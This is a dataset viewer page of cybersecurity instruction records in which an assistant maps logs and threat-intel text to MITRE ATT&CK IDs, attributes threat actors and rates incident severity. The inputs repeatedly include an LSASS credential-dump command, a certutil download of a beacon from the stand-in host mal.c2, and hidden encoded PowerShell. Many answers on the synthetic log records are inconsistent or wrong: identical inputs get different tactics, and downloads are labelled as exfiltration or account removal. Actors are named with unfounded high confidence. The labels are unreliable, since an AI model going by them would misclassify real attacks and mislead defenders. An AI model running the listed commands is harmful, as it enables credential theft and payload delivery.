messages listlengths 2 2 |
|---|
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 1610 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.175.90.106",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\", \"TA0043\"], \"techniques\":... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Bad Rabbit has encrypted files and disks using AES-128-CBC and RSA-2048.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1486\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: LOLBin, WMI, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence\": \"High\"}"... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 734 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.85.54.177",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-3AWV5SIFMX)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Persistence, Privilege Escalation, Discovery",
"role": "user"
}... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.124.4.210",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1531... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.39.33.76",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\", \"TA0040\", \"TA0003\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, Fileless, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence\": \"Hig... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, Base64, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", ... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Kessel can RC4-encrypt credentials before sending to the C2.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1560\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\"... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: [UUID].plist within the ~/Library/Preferences/ByHost directory.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1547\", \"T1547.007\"]}",
"role": "assistant"
... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: BlackEnergy injects its DLL component into svchost.exe.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0005\"], \"techniques\": [\"T1055\", \"T1055.001\"]}",
"role": "assistant"
}
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, WMI, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"c... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 647 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.97.1.9",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0001\", \"TA0... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-49F7JJ7O21)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion, Exfiltration, Execution",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2701 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, WMI, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence\":... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 1360 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.187.136.95",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\", \"TA0008\"], \"techniques\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, JA3 Spoof, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: WMI, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confidence\": \"High\... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Lokibot is delivered via a malicious XLS attachment contained within a spearhpishing email.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\"], \"techniques\": [\"T1566\", \"T1566.001\"]}",
... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.38.127.131",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T154... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2842 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, Fileless, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-RTJ441H9KU)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Collection",
"role": "user"
},
{
"content": "{\"severity\": \"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.179.39.251",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"t... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: ZIRCONIUM has used a tool to capture the username on a compromised host in order to register it with C2.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1033\"]}",
"role": "assistant"
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-N9UWPEUKWE)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Execution, Privilege Escalation, Command and Control",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-ABKL0J0CXM)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Exfiltration, Reconnaissance",
"role": "user"
},
{
"content": "{... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Base64, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"c... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: The executable attempts to download a couple of files from different sources and saves them in the AppData and Startup folders for persistence, then invokes the first downloaded file – Picture2.exe",
"role": "user"
},
{
"co... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-8QSB26V7NJ)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Reconnaissance",
"role": "user"
},
{
"content": "{\"severity\"... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: The MirageFox binaries export a function called dll_wWinMain, the name of an export in vsodscpl.dll, a module by McAfee that is loaded by a few of their executables that import and call this function",
"role": "user"
... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.77.106.73",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\",... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.42.203.132",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\"], \"techniques\": [\"T... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-3BJPB1DZ5P)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Reconnaissance, Persistence, Impact",
"role": "user"
},
{
"conten... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: JA3 Spoof, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"conf... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 3470 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.168.236.25",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0003\", \... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may use exploits during various phases of the adversary lifecycle ( Exploit Public-Facing Application, Exploitation for Client Execution, Exploitation for Privilege Escalation, Exploitation for Defense Evasion, Exploitation... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Microsoft released an optional patch update - KB3045645 - that will remove the \"auto-elevate\" flag within the sdbinst.exe.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"tec... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-EEPRUFOBUC)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Reconnaissance",
"role": "user"
},
{
"content": "{\"severity\": \"Extre... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: JA3 Spoof, Fileless, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Scattere... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, Base64, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-7H0RYQBFF7)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement, Command and Control, Credential Access",
"role": "u... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-VBNX13YI8M)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Collection",
"role": "user"
},
{
"content": "{\"severity\": \"High\", \... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 3007 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.23.160.135",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0009\"], \"techniques\": ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, JA3 Spoof, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confidence\": \"... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Some Orz versions have an embedded DLL known as MockDll that uses process hollowing and Regsvr32 to execute another payload.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0005\"], \"technique... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-YD4BPXHE0C)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation, Reconnaissance, Impact",
"role": "user"
},
... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Log attempts to read/write to BIOS and compare against known patching behavior.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1495\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Monitor executed commands and arguments that may perform sudo caching and/or use the suoders file to elevate privileges, such as the sudo command.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-PPQ196BK1G)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Execution",
"role": "user"
},
{
"content": "{\"severity\": \... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", ... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0005\"], ... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: It has been observed loading a Linux Kernel Module (LKM) and then deleting it from the hard disk as well as overwriting the data with null bytes.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3886 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.17.98.119",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA0011\"], \"techniques... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-YFYLI8AHGD)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Persistence",
"role": "user"
},
{
"content": "{\"severity\": \... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: The Name key indicates an arbitrary name assigned by the creator and the Exec key indicates the application and command line arguments to execute.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.72.186.214",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T1570\"]... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.88.0.213",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.7.127.43",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0008\", \"TA0001\"], \"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-YFT8GMI5IZ)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Persistence",
"role": "user"
},
{
"content": "{\"severity\": ... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Use auditing tools capable of detecting hijacking opportunities on systems within an enterprise and correct them.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\", \"TA0005\"], \"techniqu... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.111.165.209",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\", \"TA00... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-OPSNUC9Y8Z)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Collection, Discovery, Credential Access",
"role": "user"
},
{
... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0005\", \"TA0011\"], \"tec... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, WMI, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-9JE2JM3JAL)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Persistence, Execution",
"role": "user"
},
{
"content": "{\"severity\": \"Hi... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-2X1J8VLH0L)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Persistence, Lateral Movement",
"role": "user"
},
{
"conte... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Kivars has the ability to conceal its activity through hiding active windows.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1564.003\", \"T1564\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: 15 Database dump Decoded, it reveals a detailed log of each affected machine",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1003\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.145.241.56",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: This may take the many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere wi... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: The SMOKEDHAM source code is embedded in the dropper as an encrypted string.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-EGZXTYVIMD)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement, Initial Access, Collection",
"role": "user"
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2269 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, WMI, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confidenc... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 2937 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.52.235.78",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\", \"TA0002... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Windows API functions such as GetLocaleInfoW can also be used to determine the locale of the host.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1614\"]}",
"role": "assis... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.128.181.91",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\", \"TA0009\", \"TA0011\"], ... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.20.114.214",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, JA3 Spoof, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"conf... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"conf... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, Fileless, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3160 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confid... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 3351 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.32.186.208",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\"], \"techniques\":... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-WNBUI75ZO0)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Discovery, Exfiltration",
"role": "user"
},
{
"content": "{\"sev... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-D4IF1NBBRB)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Execution",
"role": "user"
},
{
"content": "{\"severity\": \"E... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: Search Open Technical Databases).",
"role": "user"
},
{
"content": "{\"tactics\": [... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Pysa has used brute force attempts against a central management console, as well as some Active Directory accounts.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1110\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-52YVKJ5DDU)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Exfiltration",
"role": "user"
},
{
"content": "{\"severity\": \"High\", ... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.140.74.67",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA00... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 524 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.24.26.132",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 2134 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.147.217.80",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3847 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, LOLBin, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confidenc... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-JB5OSY2TJ2)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Persistence",
"role": "user"
},
{
"content": "{\"severity\": \"Crit... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Analysts can also monitor for use of Windows APIs such as CreateProcessWithTokenW and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administra... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Fileless, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"co... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.51.171.116",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\", \"TA0011\"], \"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.72.206.85",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-8BZS2I7GPF)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Credential Access, Initial Access",
"role": "user"
},
{
"content":... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 3420 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.150.213.133",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T156... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.